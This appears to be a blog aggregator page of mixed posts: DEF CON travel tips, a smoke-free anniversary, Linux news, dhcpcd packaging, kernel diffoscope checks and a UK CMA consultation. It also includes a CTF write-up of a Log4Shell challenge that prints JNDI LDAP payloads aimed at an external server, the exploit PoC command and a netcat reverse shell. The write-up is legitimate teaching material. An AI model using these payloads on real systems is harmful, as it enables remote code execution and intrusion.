  • Ringzer0 has a special rate for those attending their training at Park MGM. One feature of this hotel is that the entire thing is Non-Smoking. Along with Vdara and the Delano, this is an unusual quality on the strip and great for those with allergies.

Airfare is obviously high dependant on where you are originating. If it’s not too far and airfare looks a bit pricey for you, check out whether anyone from a local DEF CON Group is driving and maybe you can split the gas and make a new friend! There’s also ride and room share threads on the DEF CON Forum. While there’s obviously good reasons to be careful of who you ride or room with, lots of people have had success and met new friends along the way.

Bringing Tech

Some people want to spend the whole week hacking. Some want to be hands-off keyboard the whole week. You might be somewhere in between. What you want to do during the week will dictate a lot of the tech you bring with you.

Since I will be attending a training event and enjoy playing in the contests/CTFs, I will necessarily be bringing a laptop with me – in this case, my Framework Laptop that I love. (Full review of that coming soon.) I have a 1TB SSD which should be enough for VMs for training and CTFs as well, but I’ll probably also bring along an external SSD for sharing resources. They’re light enough that the speed advantage over a typical flash drive is worth it.

If you do intend to take a training or play a CTF for more than a little bit, I can’t recommend a wireless mouse enough. Even the great trackpad on Macbooks just doesn’t feel as good to me as a mouse after a few hours.

Outlets can also be quite limited, so if you bring a travel power strip, you can always squeeze in where someone else has plugged in and even provide more outlets. Sharing is caring!

I’ll also have my Pixel 6 Pro, but won’t bring any work tech along with me – I’m fortunate to not be in an urgent/oncall role, and this allows me to better focus on what I’m doing there instead of what’s going on in the office. Though phone battery life has gotten pretty good for a lot of phones, I’ll still bring a backup battery bank. There are even ones capable of charging many laptops available, though they get a bit bulky and heavy.

I’ll cover protecting your tech down below, but the short form is that I have no problem bringing things (laptop, phone, etc.).

Packing

Look, it’s Las Vegas in August. You don’t need to check a weather forecast to know that it’s going to be hot. Reaching 45℃ (110℉) is not out of the question. There’s not likely to be much rain, but I have seen it a time or two. Windy is a definite possibility though. Dress accordingly.

In the casinos and the conference areas, the air conditioning is often on full blast. I’m personally comfortable in a T-Shirt and jeans or shorts, but if you’re prone to being cold under such conditions, a lightweight hoodie or jacket might not be a bad idea.

I have two schools of thought on carrying things with me. Some years, I have intentionally used a smaller backpack to avoid lugging so much stuff around with me for days on end. This does work out, but then I end up wishing I had certain other items. The other extreme is carrying my EDC backpack full of gear and a sore back after a couple of days. Carrying the smaller backpack is probably the better decision, but I can’t say I’m always known for making the best decisions.

It may seem a bit anachronistic, but I also suggest carrying a small notebook (I’m quite partial to Field Notes with Dot-Graph paper) and pen. To this day, I still find it easier to make quick notes on pen and paper than on my phone, especially if I need a diagram or drawing of any sort. (It also requires no recharging.)

Safety

Stay Healthy

Addressing the elephant in the room, there is still a pandemic going on, and new variants all the time. Everyone has already made up their mind on vaccinations, so I’m not going to try to push anyone on that, but I will strongly suggest bringing some tests with you to Las Vegas. If you test positive, please don’t come to the conferences and infect others. Yes, missing out on part of con will suck, but it’s still the right thing to do. DEF CON and BSidesLV are both requiring masking at all times (consider ear savers), except when eating, drinking, or presenting. Neither is requiring proof of vaccination.

Even prior to the pandemic, Hacker Summer Camp posed its own health challenges. Inadequate sleep is nearly universal, and drinking, heat, and dry air can quickly lead to dehydration. Drinking water is absolutely critical. I strongly recommend bringing an insulated water bottle, and you can refill from water fountains in the conference space. Bottled water in the hotels is extremely expensive (I believe most people would call it a “rip-off”) but if you want to get bottled water, I suggest going to CVS, or the ABC convenience stores on the Strip. (Fun fact, those stores also sell alcohol at pretty reasonable prices if you want to have a drink in your room. Hotel rules would definitely preclude carrying a flask in the conference space, so no hackers would ever do that.)

I particularly hate the heat, so I also bring a couple of “cooling towels” – you dampen them, and the evaporating water causes them to cool off, consequently cooling you off. They also make a great basic towel for wiping sweat away or any other quick use. I was skeptical when I first heard of them, but they really work to make you feel cooler.

Physical Safety

Las Vegas is a bit of a unique city in that it’s built entirely around the tourism industry. This is even more true on or near “The Strip”, the section of Las Vegas Boulevard from The STRAT to Mandalay Bay (just north of Reid Airport). Every scam you can imagine is being played here as well as many you won’t even have thought of. Your Social Engineering instincts should be on high alert.

Pickpocketing and theft of anything unattended are both commonplace on the strip, but robbery less so on the strip. It’s more your belongings than you yourself that are at risk. Stay in a group if you can.

Know that the street performers have an expectation of getting paid if you take a photo with them. This ranges from a guy in a poor Mickey Mouse costume to women dressed up as Las Vegas showgirls. It may get confrontational if you take a photo and try not to tip them at all, but also don’t let them rip you off if you decide to do this.

Electronic Safety

If you have fully up-to-date (patched) devices, I do not believe the risk of compromise to be especially high. Consider the value of 0-day exploits in modern platforms along with the number of reverse engineers and malware analysts present who might get a copy, resulting in the 0-day being “burned”. To the best of my knowledge, no device I’ve ever taken has been compromised. (And yes, I used to take “burner” devices, my views on this have evolved over the years.)

If you have a device that can’t run the latest available OS (i.e., no longer receives Android or iOS Updates), I strongly recommend upgrading, whether or not you plan to bring it to DEF CON. Unfortunately there are enough browser and similar bugs that affect older OSs that they’re basically unsafe on any public network, not just the ones at these conferences.

At DEF CON, they provide both an “open” network (on which there are plenty of shenanigans, but not modern OS 0-day as far as I’m aware) and a “secure” network that uses 802.1x authentication with certificates (make sure you verify the network certificate) and also prevents client-to-client traffic.

I do recommend not bringing any particularly sensitive data, and having a thorough backup before your trip.

VPNs are a bit of a controversial topic in the security space right now. Too many providers pretend they can offer things they can. At a simple level, your traffic is eventually egressing onto the public internet, and it’s not end-to-end encryption. If you’re in the security space and not familiar with how commercial VPNs work, now might be a great time to look more into it. I do think they have value on open wireless networks because the opportunity for meddler-in-the-middle attacks is less on a VPN than on the open WiFi. I personally use Private Internet Access but there are many options out there.

FAQs

What’s a Goon?

DEF CON Goons are the volunteer army that help make sure DEF CON occurs as successfully and safely as possible. While they have a bit of a reputation for their loudness and directness, their goal is to keep things moving and do so safely. They can be identified by their red DEF CON badges.

Where can I learn more about the history of DEF CON?

I’m hardly a historian, but I can recommend checking out the DEF CON documentary produced by Jason Scott at DEF CON 20 in 2012.

What is Badgelife?

The official DEF CON badges eventually inspired other creators to get into the space of making badges as well. These may be electronic, laser cut, hand crafted, and more. Some will be sold publicly, others are given out to friends, and still others may be associated with an activity in one of the villages. These are often called “unofficial badges” since they are not associated with the DEF CON organizers and they don’t gain you access to the conference. (Some may gain you access to parties and events run by their creators, however.)

The electronic component shortage associated with the pandemic has slowed things down a bit, but this space appears poised to make a come back this year or so. At the end of the day, Badgelife is just a particularly nerdy form of art. (I’ve been a small-volume badgelife creator for a few years, so I feel well positioned to acknowledge the nerdiness.)

Where Can I See Past Talks?

The DEF CON Media Server has all the media from every DEF CON held, but not every DEF CON had talks recorded. Many of the videos have also been uploaded to YouTube.

Black Hat posts some of the videos from their conferences to their YouTube page. Likewise, BSidesLV has a YouTube page with their talks. Finally, The Diana Initiative has also uploaded their videos from 2021. (Though apparently none from before that time, at least that I could locate.)

What is the Rule on Photography?

Until about 10 years ago, the rule was no photography allowed but now that basically everyone carries a camera with them wherever they go (my phone actually has 4 separate cameras), it’s been updated a bit:

Everyone in the photo must consent to having their photo taken at both DEF CON and BSidesLV. (And, quite frankly, this is good advice for life in general.) This includes individuals in the background, etc. There may also be areas (Skytalks, Mohawkcon) that absolutely prohibit photography. I have personally witnessed individuals removed from events for violating this rule.

At DEF CON 15, an undercover reporter was chased from the event. While the events do allow press, they are required to register as such (which earns them a specially-colored badge) and the policies require they identify themselves as press to participants.

A reporter coming “undercover” hoping to catch individuals openly discussing criming in the hallways is likely to be very disappointed. You’re far more likely to catch people mocking the security industry itself.

I Don’t Know Anyone – How Do I Meet People?!

I struggle with this myself, but the Lonely Hackers Club has a great guide.

Closing

I hope some of these tips have been helpful to at least some of you. :) Feel free to reach me on Twitter with any feedback you might have. If you want to get into the right mindset, I highly recommend checking out the music CDs or live recordings from past DEFCONs or checking out Dual Core Music.

on July 20, 2022 07:00 AM

Tobacconists hate him.

It’s that time of the year. I never really know who this sort of post is for. Maybe it’s for you, maybe for it’s for me one dark day in the future, but…

🎉  I stopped smoking ten years ago!

If somebody as flimsy-willed as me can stop smoking, you can stop smoking too. I’m not going to labour the “it kills you” thing, but it is so here’s the financial breakdown for any fellow cheapskates.

  10 years =  3,652 days
@13/day = 47,476 cigs
= 2,374 packs

2012 price = £7.10 /pack
2022 price = £12.50 /pack
Mean price = £9.80 /pack

I’ve not smoked £23,265.20.

If I’d regularly deposited that into an investment account, a 2% return that would be £25k and 5% would be almost £30k.

I’d say I feel fantastic but I am also ten years older. I gained two children a dog, and everything hurts. But I don’t smoke. I don’t feel the urge to smoke, and haven’t for years. I never have to stand outdoors on cold, wet nights to smoke. I don’t panic when I’m running out of cigarettes. And that means a lot.

It’s easier to just not smoke

You might not be convinced and that’s because we’re all told it’s really hard to stop smoking. All the time. Even by people who want smokers to quit, as if it’s something that takes a run-up, an intake of bravery and team-cajoling. It’s not hard; just stop smoking the bloody things.

The rest is understanding your body and addiction, that smoking never made you feel better, it only made not smoking feel worse. As soon as you cut that cycle, your body recalibrates. As soon as you realise that, the infinitesimal cost of quitting seems worth it.

If you’re trying to quit and you’re not finding it easy, stick with it. If you need help understanding addiction, Allen Carr’s Easy Way to Stop Smoking has an eerily convincing narrative that plods through the feelings every smoker goes through. I never finished it —I convinced myself I didn’t want to quit— but it was absolutely the basis for the voice in my head that let me quit later on.

on July 20, 2022 12:00 AM

July 19, 2022

The Lubuntu Team is happy to announce that the Lubuntu Backports PPA is now available for general use. You can find details on enabling it in this blog post.
on July 19, 2022 09:45 PM

July 17, 2022

Full Circle Weekly News #270

Full Circle Magazine


SFC urges open source projects to stop using GitHub:
https://sfconservancy.org/blog/2022/jun/30/give-up-github-launch/

Porteus 5.0 distribution released:
https://forum.porteus.org/viewtopic.php?f=35&t=10183

Release of Zabbix 6.2:
https://www.zabbix.com/documentation/6.2/manual/introduction/whatsnew620

The KDE project introduced their fourth generation of KDE Slimbooks:
https://kde.slimbook.es/

Oracle Linux 9 and Unbreakable Enterprise Kernel 7 available:
https://blogs.oracle.com/linux/post/announcing-oracle-linux-9-general-availability

NIST Approves Quantum Resistant Encryption Algorithms:
https://groups.google.com/a/list.nist.gov/g/pqc-forum/c/G0DoD7lkGPk

Lennart Pottering left Red Hat and joined Microsoft:
https://www.phoronix.com/scan.php?page=news_item&px=Systemd-Creator-Microsoft

Release of SpaceVim 2.0:
https://spacevim.org/SpaceVim-release-v2.0.0/

Ubuntu MATE distribution has generated builds for the Raspberry Pi:
https://ubuntu-mate.community/t/ubuntu-mate-22-04-lts-for-raspberry-pi-is-out-now/25634

wxWidgets 3.2.0 graphical toolkit:
https://wxwidgets.org/news/2022/07/wxwidgets-3.2.0-final-release/

Bacula 13.0.0 Available:
https://www.bacula.org/bacula-release-13-0-0/

Microsoft introduces a ban on the sale of open source software through the Microsoft Store:
https://sfconservancy.org/blog/2022/jul/07/microsoft-bans-commerical-open-source-in-app-store/

nDPI 4.4 Deep Packet Inspection Released:
https://www.ntop.org/ndpi/introducing-ndpi-4-4-many-new-protocols-improvements-and-cybersecurity-features/

Debian 11.4 update:
https://www.debian.org/News/2022/20220709

rclone 1.59  released:
https://forum.rclone.org/t/rclone-1-59-0-release/31808

Release of Libreboot 20220710, a completely free distribution of Coreboot:
https://libreboot.org/news/libreboot20220710.html




Credits:
Full Circle Magazine
@fullcirclemag
Host: bardmoss@pm.me, @bardictriad
Bumper: Canonical
Theme Music: From The Dust - Stardust
https://soundcloud.com/ftdmusic
https://creativecommons.org/licenses/by/4.0/
on July 17, 2022 04:58 PM

July 14, 2022

As of July 14, 2022, all flavors of Ubuntu 21.10, including Ubuntu Studio 21.10, codenamed “Impish Indri”, have reached end-of-life (EOL). There will be no more updates of any kind, including security updates, for this release of Ubuntu.

If you have not already done so, please upgrade to Ubuntu Studio 22.04 LTS via the instructions provided here.

No single release of any operating system can be supported indefinitely, and Ubuntu Studio has no exception to this rule.

Regular Ubuntu releases, meaning those that are between the Long-Term Support releases, are supported for 9 months and users are expected to upgrade after every release with a 3-month buffer following each release.

Long-Term Support releases are identified by an even numbered year-of-release and a month-of-release of April (04). Hence, the most recent Long-Term Support release is 22.04 (YY.MM = 2022.April), and the next Long-Term Support release will be 24.04 (2024.April). LTS releases for official Ubuntu flavors (not Desktop or Server which are supported for five years) are three years, meaning LTS users are expected to upgrade after every LTS release with a one year buffer.

on July 14, 2022 12:00 PM

July 13, 2022

Happens that I spent today (Finally) a good few hours trying to figure out why my autocompletion was broken on my new shiny MacBook Pro M1 Pro…

despite Homebrew’s brew doctor giving me the All OK.

foursixnine@pakhet ~ % brew doctor
Your system is ready to brew.

turns out that it was just the shell:

foursixnine@pakhet ~ % echo $FPATH
/opt/homebrew/share/zsh-completions:/usr/local/share/zsh/site-functions:/usr/share/zsh/site-functions:/usr/share/zsh/5.8.1/functions

My user’s shell is still being set to osx’s 5.8.1 zsh…

So after hours of searching on the internet to no avail, and scratching my head, I came back to my initial idea of just switching the shell::

echo "export PATH=/opt/homebrew/bin:$PATH" >> ~/.zshenv
sudo sh -c "echo $(which zsh) >> /etc/shells"
chsh -s $(which zsh)
on July 13, 2022 12:00 AM

July 07, 2022

GitHub Action အကြောင်း နဲ့ ဘာလို့ ARC သုံးဖြစ်သွားလဲ?  ကျနော့် အလုပ်မှာ လိုလို့ လိုက်ရှာရင်း သုံးဖြစ်တဲ့ GitHub Action  Runner Controller (ARC) ဆိုတဲ့ open source project အကြောင်းလေး ပြန်မျှဝေချင်ပါတယ်။ ဒါက သူရဲ့ GitHub link ပါ။ GitHub Action ဆိုတာ software development process မှာ ရေးပြီးသား code တွေ test ဖို့ software release တွေ automate လုပ်ဖို့တို့ container image တွေ သုံးတဲ့ organization တွေဆိုရင် software release လုပ်ပြီးတာနဲ့ တပြိုင်နက် […]

on July 07, 2022 06:43 AM

July 04, 2022

https://www.mixcloud.com/dholbach/wednesday-night-at-dubstation-at-fusion-2022/

It was a last-minute request that led me to Fusion this year. One act unfortunately needed to cancel, so Tuesday night I packed things to play at Dubstation the next day.

It was a great experience for me … thanks so much to everyone who turned up and to the lovely team of organisers as well! 💖

  1. Cocotaxi - Cactus
  2. JÇÃO & Caracas Dub - Suena la decadente
  3. Masia One - Warriors Tongue (An-ten-nae Remix)
  4. coss - Come Into My Room
  5. Noema - Twilight (Xique-Xique Nightglow Remix)
  6. Smoke City - Underwater Love (Bendix Edit)
  7. Xique-Xique - Xaxoeira
  8. Ana Tijoux - 1977 (106er Edit)
  9. VON Krup Feat. Alekzal - Fosfenos (jiony Remix)
  10. Xique-Xique - Pirilampos (House Mix 2016 Remaster)
  11. Eartha Kitt - Angelitos Negros (Billy Caso’s Sliced Sky Remix)
  12. The Tribe Of Good - Heroes (edit)
  13. Satori - Days Without You (Crussen Remix)
  14. Dombrance - Taubira (Prins Thomas Diskomiks)
  15. Emanuelle - Italove
  16. 9EYE - Orisa (Dario Klein Remix)
  17. Canu, Nu, Alejandro Castelli - Mariposa (VIKEN ARMAN Remix)
  18. Tunnelvisions - Guava (Extended Mix)
  19. DjeuhDjoah & Lieutenant Nicholson - El Niño
  20. RSS Disco - Pie Pie Pie
  21. LeSale - (I’ve Had) The Time Of My Life (Le Sale’s Second Base Edit) [Dirty Dancing Remix]
  22. hubbabubbaklubb - Mopedbart (Barda Edit)
  23. Crussen - Bufarsveienen
  24. Renegades Of Jazz - Beneath This African Blue (Paradise Hippies Remix)
  25. Takeshi’s Cashew - Akihi (Surv Remix)
  26. Mina & Alberto Lupo - Paroles, Paroles (Gaviño Edit)
on July 04, 2022 07:00 AM

July 03, 2022

Given news that ISC's DHCP suite is getting deprecated by upstream and seeing how dhclient has never worked properly for DHCPv6, I decided to look into alternatives. ISC itself recommends Roy Maple's dhcpcd as a migration path. Sadly, Debian's package had been left unattended for a good 2 years. After refactoring the packaging, updating to the latest upstream and performing one NMU, I decided to adopt the package.

Numerous issues were exposed in the process:

  • Upstream's ./configure makes BSD assumptions. No harm done, but still...
  • Upstream's ./configure is broken. --prefix does not propagate to all components. For instance, I had to manually specify the full path for manual pages. Patches are welcome.
  • Debian had implemented custom exit hooks for all its NTP packages. Since then, upstream has implemented this in a much more concise way. All that's missing upstream is support for timesyncd. Patches are welcome.
  • I'm still undecided on whether --prefix should assume / or /usr for networking binaries on a Debian system. Feedback is welcome.
  • The previous maintainer had implemented plenty of transitional measures in maintainer scripts such as symbolically linking /sbin/dhcpcd and /usr/sbin/dhcpcd. Most of this can probably be removed, but I haven't gotten around verifying this. Feedback and patches are welcome.
  • The previous maintainer had created an init.d script and systemd unit. Both of these interfere with launching dhcpcd using ifupdown via /etc/network/interfaces which I really need for configuring a router for IPv4 MASQ and IPv6 bridge. I solved this by putting them in a separate package and shipping the rest via a new binary target called dhcpcd-base along a logic similar to dnsmasq.
  • DHCPv6 Prefix Delegation mysteriously reports enp4s0: no global addresses for default route after a reboot. Yet if I manually restart the interface, none of this appears. Help debuging this is welcome.
  • Support for Predictable Interface Names was missing because Debian's package didn't Build-Depends on libudev-dev. Fixed.
  • Support for priviledge separation was missing because Debian's package did not ./configure this or create a system user for this. Fixed.
  • I am pondering moving the Debian package out of the dhcpcd5 namespace back into the dhcpcd namespace. The 5 was the result of an upstream fork that happened a long time ago and the original dhcpcd package no longer is in the Debian archive. Feedback is welcome on whether this would be desirable.

The key advantage of dhcpcd over dhclient is that works as a dual-stack DHCP client by design. With privilege separation enabled, this means separate child processes handling IPv4 and IPv6 configuration and passing the received information to the parent process to configure networking and update /etc/resolv.conf with nameservers for both stacks. Additionally, /etc/network/interfaces no longer needs separate inet and inet6 lines for each DHCP interface, which makes for much cleaner configuration files.

A secondary advantage is that the dual-stack includes built-in fallback to Bonjour for IPv4 and SLAAC for IPv6. Basically, unless the interface needs a static IP address, this client handles network configuration in a smart and transparent way.

A third advantage is built-in support for DHCPv6 Prefix Delegation. Enabling this requires just two lines in the configuration file.

In the long run, I feel that dhcpcd-base should probably replace isc-dhcp-client as the default DHCP client with priority Important. Adequate IPv6 support should come out of the box on a standard Debian installation, yet dhclient never got around implementing that properly.

on July 03, 2022 08:57 AM

June 24, 2022

As part of the continuing work to replace 1-element arrays in the Linux kernel, it’s very handy to show that a source change has had no executable code difference. For example, if you started with this:

struct foo {
    unsigned long flags;
    u32 length;
    u32 data[1];
};

void foo_init(int count)
{
    struct foo *instance;
    size_t bytes = sizeof(*instance) + sizeof(u32) * (count - 1);
    ...
    instance = kmalloc(bytes, GFP_KERNEL);
    ...
};

And you changed only the struct definition:

-    u32 data[1];
+    u32 data[];

The bytes calculation is going to be incorrect, since it is still subtracting 1 element’s worth of space from the desired count. (And let’s ignore for the moment the open-coded calculation that may end up with an arithmetic over/underflow here; that can be solved separately by using the struct_size() helper or the size_mul(), size_add(), etc family of helpers.)

The missed adjustment to the size calculation is relatively easy to find in this example, but sometimes it’s much less obvious how structure sizes might be woven into the code. I’ve been checking for issues by using the fantastic diffoscope tool. It can produce a LOT of noise if you try to compare builds without keeping in mind the issues solved by reproducible builds, with some additional notes. I prepare my build with the “known to disrupt code layout” options disabled, but with debug info enabled:

$ KBF="KBUILD_BUILD_TIMESTAMP=1970-01-01 KBUILD_BUILD_USER=user KBUILD_BUILD_HOST=host KBUILD_BUILD_VERSION=1"
$ OUT=gcc
$ make $KBF O=$OUT allmodconfig
$ ./scripts/config --file $OUT/.config \
        -d GCOV_KERNEL -d KCOV -d GCC_PLUGINS -d IKHEADERS -d KASAN -d UBSAN \
        -d DEBUG_INFO_NONE -e DEBUG_INFO_DWARF_TOOLCHAIN_DEFAULT
$ make $KBF O=$OUT olddefconfig

Then I build a stock target, saving the output in “before”. In this case, I’m examining drivers/scsi/megaraid/:

$ make -jN $KBF O=$OUT drivers/scsi/megaraid/
$ mkdir -p $OUT/before
$ cp $OUT/drivers/scsi/megaraid/*.o $OUT/before/

Then I patch and build a modified target, saving the output in “after”:

$ vi the/source/code.c
$ make -jN $KBF O=$OUT drivers/scsi/megaraid/
$ mkdir -p $OUT/after
$ cp $OUT/drivers/scsi/megaraid/*.o $OUT/after/

And then run diffoscope:

$ diffoscope $OUT/before/ $OUT/after/

If diffoscope output reports nothing, then we’re done. 🥳

Usually, though, when source lines move around other stuff will shift too (e.g. WARN macros rely on line numbers, so the bug table may change contents a bit, etc), and diffoscope output will look noisy. To examine just the executable code, the command that diffoscope used is reported in the output, and we can run it directly, but with possibly shifted line numbers not reported. i.e. running objdump without --line-numbers:

$ ARGS="--disassemble --demangle --reloc --no-show-raw-insn --section=.text"
$ for i in $(cd $OUT/before && echo *.o); do
        echo $i
        diff -u <(objdump $ARGS $OUT/before/$i | sed "0,/^Disassembly/d") \
                <(objdump $ARGS $OUT/after/$i  | sed "0,/^Disassembly/d")
done

If I see an unexpected difference, for example:

-    c120:      movq   $0x0,0x800(%rbx)
+    c120:      movq   $0x0,0x7f8(%rbx)

Then I'll search for the pattern with line numbers added to the objdump output:

$ vi <(objdump --line-numbers $ARGS $OUT/after/megaraid_sas_fp.o)

I'd search for "0x0,0x7f8", find the source file and line number above it, open that source file at that position, and look to see where something was being miscalculated:

$ vi drivers/scsi/megaraid/megaraid_sas_fp.c +329

Once tracked down, I'd start over at the "patch and build a modified target" step above, repeating until there were no differences. For example, in the starting example, I'd also need to make this change:

-    size_t bytes = sizeof(*instance) + sizeof(u32) * (count - 1);
+    size_t bytes = sizeof(*instance) + sizeof(u32) * count;

Though, as hinted earlier, better yet would be:

-    size_t bytes = sizeof(*instance) + sizeof(u32) * (count - 1);
+    size_t bytes = struct_size(instance, data, count);

But sometimes adding the helper usage will add binary output differences since they're performing overflow checking that might saturate at SIZE_MAX. To help with patch clarity, those changes can be done separately from fixing the array declaration.

© 2022, Kees Cook. This work is licensed under a Creative Commons Attribution-ShareAlike 4.0 License.
CC BY-SA 4.0

on June 24, 2022 08:11 PM

Full Circle Magazine #182

Full Circle Magazine

This month:
* Command & Conquer
* How-To : Python, Blender and Latex
* Graphics : Inkscape
* Everyday Ubuntu : Ubuntu Software Centre
* Micro This Micro That
* Review : Kubuntu 22.04
* Review : Fedora 35
* Review : Ebook Readers
* My Story : Calibre
Ubports Touch
* Ubuntu Games : Catie in Meowmeowland
plus: News, The Daily Waddle, Q&A, and more.

Get it while it’s hot: https://fullcirclemagazine.org/issue-182/

on June 24, 2022 05:19 PM

June 21, 2022

OpenUK Awards 2022

Jonathan Riddell

OpenUK is the non-profit body which promotes Open tech in the UK.

Nominations are now open for the OpenUK Awards 2022.

We’ve run our annual awards ceremony to recognise great Open tech contributions for the last two years with great success and this year nominations are open for you to join or point is to the best people, organisations and projects that need rewarded.

Two years ago it we had dinner sent to your door during Covid. Last year we dined at the centre of the world at COP26. This year we’re Lording it up with a ceremony and dinner in the House of Lords on 30 November.

House of Commons

Last week we had a preview of the event, a delayed Burns supper in the House of Commons. One of the wonderful aspects of Open tech is how it gets you to exciting places and meet interesting people. In this case SNP MPs hosted and we got to promote KDE and tech freedom.

So please nominate yourself, your project, your company or your org. Or if you know someone else who should be nominated go and nominate them. We have three fine judges lined up who will go over the entries so remember to give a good writeup of what the work done is and why it deserves recognition along with links to code repos etc so we can research it.

Categories are: software, sustainability, data, belonging, young person, finance, individual, hardware and security.

Nominate now. And take a look at the 2021 OpenUK awards for more inspiration.

on June 21, 2022 05:27 PM

June 20, 2022

Log4Shell was arguably the biggest vulnerability disclosure of 2021. Security teams across the entire world spent the end of the year trying to address this bug (and several variants) in the popular Log4J logging library.

The vulnerability was caused by special formatting strings in the values being logged that allow you to include a reference. This reference, it turns out, can be loaded via JNDI, which allows remotely loading the results as a Java class.

This was such a big deal that there was no way we could let the next BSidesSF CTF go by without paying homage to it. Fun fact, this meant I “got” to build a Java webapp, which is actually something I’d never done from scratch before. Nothing quite like learning about Jetty, Log4J, and Maven just for a CTF level.

Visiting the given application, we see a basic page with options to login and register along with a changelog:

Login4Shell

The changelog notes that the logger was “patched for Log4Shell” and that there was previously support for sub-users in the format “user+subuser”, but it has alledgedly been removed.

Registering an account, we’re requested to provide only a username. The password is given to us once we register. Registering the username “writeup”, we get the password “7fAFsdYlz-oH”. If we login with these credentials, we now see a link to a page called “Flag”, as well as a “Logout” link. Could we just get the flag directly? Let’s check.

Login4Shell Flag

Unfortunately, no such luck. We’re presented with a page containing the following:

Oh come on, it wasn’t going to be that simple. We’re going to make you work for this.

The flag is accessible at /home/ctf/flag.txt.

Oh yeah, your effort to get the flag has been logged. Don’t make me tell you again.

Noting the combination of the logging bug mentioned on the homepage (and the hint from the name of the challenge), as well as the message here about being logged, perhaps this is a place we could do something. Let’s look for anywhere accepting user input.

Other than the login and register forms, we find nothing interesting across the entire app. Attempting to put a log4shell payload into the login and register forms merely obtains an error:

Error: Username must be lowercase alphanumeric!

Taking a look at the login process, we see that we get handed a cookie (logincookie) for the session when we login:

1
eyJ1c2VybmFtZSI6IndyaXRldXAiLCJwYXNzd29yZCI6IjdmQUZzZFlsei1vSCJ9

It might be an opaque session token, but from experience, I know that ey is the base64 encoding of the opening of a JSON object ({"). Let’s decode it and see what we get:

1
{"username":"writeup","password":"7fAFsdYlz-oH"}

Interestingly enough, our session cookie is just a JSON object that contains the plaintext username and password for our user. There’s no obvious signature or MAC involved. Maybe we can tamper directly with the cookie. If I change the username by adding a letter, it effectively logs me out. Likewise, changing the password gives me the logged-out experience.

Looking back at the “subuser” syntax mentioned on the homepage, I decided to try that directly with the cookie. Setting the username to writeup+a with the same password, the site seems to recognize me as logged-in again. To check if this field might be vulnerable without needing to setup the full exploit ourselves, we can use the Huntress Log4Shell test. Inserting the provided payload gives us the following cookie:

1
2
{"username":"writeup+${jndi:ldap://log4shell.huntress.com:1389/d21b4a24-08c8-4d91-9da3-b12fa5f0a472}","password":"7fAFsdYlz-oH"}
eyJ1c2VybmFtZSI6IndyaXRldXArJHtqbmRpOmxkYXA6Ly9sb2c0c2hlbGwuaHVudHJlc3MuY29tOjEzODkvZDIxYjRhMjQtMDhjOC00ZDkxLTlkYTMtYjEyZmE1ZjBhNDcyfSIsInBhc3N3b3JkIjoiN2ZBRnNkWWx6LW9IIn0=

If we set our cookie to that value, then visit the /flag page again so our attempt is logged, we should trigger the vulnerability, as we understand it so far. Doing so, then refreshing our page on Huntress shows the callback hitting their server. We’ve successfully identified a sink for the log4shell payload! Now we just need to serve up a payload.

Unfortunately, this requires an internet exposed server. There’s a couple of ways to do this, such as port forwarding on your router, a service like ngrok, or running a VPS/Cloud Server. In this case, I’ll use a VPS from Digital Ocean.

I grabbed the log4j-shell-poc from kozmer to launch the attack. This, itself, depends on the marshalsec project. This requires exposing 3 ports: LDAP on port 1389, a port for the reverse shell, and a port for an HTTP server for the payload. The LDAP server will point to the HTTP server, which will provide a class file as the payload, which launches a reverse shell to the final port. We launch the PoC with our external IP:

1
2
3
4
5
6
7
8
9
python3 ./poc.py --userip 137.184.181.246

[!] CVE: CVE-2021-44228
[!] Github repo: https://github.com/kozmer/log4j-shell-poc

[+] Exploit java class created success
[+] Setting up LDAP server

[+] Send me: ${jndi:ldap://137.184.181.246:1389/a}

After starting a netcat listener on port 9001, we send the provided string in our username within the cookie and load the flag page again:

1
2
{"username":"writeup+${jndi:ldap://137.184.181.246:1389/a}","password":"7fAFsdYlz-oH"}
eyJ1c2VybmFtZSI6IndyaXRldXArJHtqbmRpOmxkYXA6Ly8xMzcuMTg0LjE4MS4yNDY6MTM4OS9hfSIsInBhc3N3b3JkIjoiN2ZBRnNkWWx6LW9IIn0=

Upon reloading, we see our netcat shell light up:

1
2
3
4
5
6
7
nc -nvlp 9001
Listening on 0.0.0.0 9001
Connection received on 35.247.118.88 36856
id
uid=2000(ctf) gid=2000(ctf) groups=2000(ctf)
cat /home/ctf/flag.txt
CTF{thanks_for_logging_in_to_our_logs_login_shell}
on June 20, 2022 07:00 AM

June 17, 2022

Help the CMA help the Web

Stuart Langridge

As has been mentioned here before the UK regulator, the Competition and Markets Authority, are conducting an investigation into mobile phone software ecosystems, and they recently published the results of that investigation in the mobile ecosystems market study. They’re also focusing in on two particular areas of concern: competition among mobile browsers, and in cloud gaming services. This is from their consultation document:

Mobile browsers are a key gateway for users and online content providers to access and distribute content and services over the internet. Both Apple and Google have very high shares of supply in mobile browsers, and their positions in mobile browser engines are even stronger. Our market study found the competitive constraints faced by Apple and Google from other mobile browsers and browser engines, as well as from desktop browsers and native apps, to be weak, and that there are significant barriers to competition. One of the key barriers to competition in mobile browser engines appears to be Apple’s requirement that other browsers on its iOS operating system use Apple’s WebKit browser engine. In addition, web compatibility limits browser engine competition on devices that use the Android operating system (where Google allows browser engine choice). These barriers also constitute a barrier to competition in mobile browsers, as they limit the extent of differentiation between browsers (given the importance of browser engines to browser functionality).

They go on to suggest things they could potentially do about it:

A non-exhaustive list of potential remedies that a market investigation could consider includes:
  • removing Apple’s restrictions on competing browser engines on iOS devices;
  • mandating access to certain functionality for browsers (including supporting web apps);
  • requiring Apple and Google to provide equal access to functionality through APIs for rival browsers;
  • requirements that make it more straightforward for users to change the default browser within their device settings;
  • choice screens to overcome the distortive effects of pre-installation; and
  • requiring Apple to remove its App Store restrictions on cloud gaming services.

But, importantly, they want to know what you think. I’ve now been part of direct and detailed discussions with the CMA a couple of times as part of OWA, and I’m pretty impressed with them as a group; they’re engaged and interested in the issues here, and knowledgeable. We’re not having to educate them in what the web is. The UK’s potential digital future is not all good (and some of the UK’s digital future looks like it could be rather bad indeed!) but the CMA’s work is a bright spot, and it’s important that we support the smart people in tech government, lest we get the other sort.

So, please, take a little time to write down what you think about all this. The CMA are governmental: they have plenty of access to windy bloviations about the philosophy of tech, or speculation about what might happen from “influencers”. What’s important, what they need, is real comments from real people actually affected by all this stuff in some way, either positively or negatively. Tell they whether you think they’ve got it right or wrong; what you think the remedies should be; which problems you’ve run into and how they affected your projects or your business. Earlier in this process we put out calls for people to send in their thoughts and many of you responded, and that was really helpful! We can do more this time, when it’s about browsers and the Web directly, I hope.

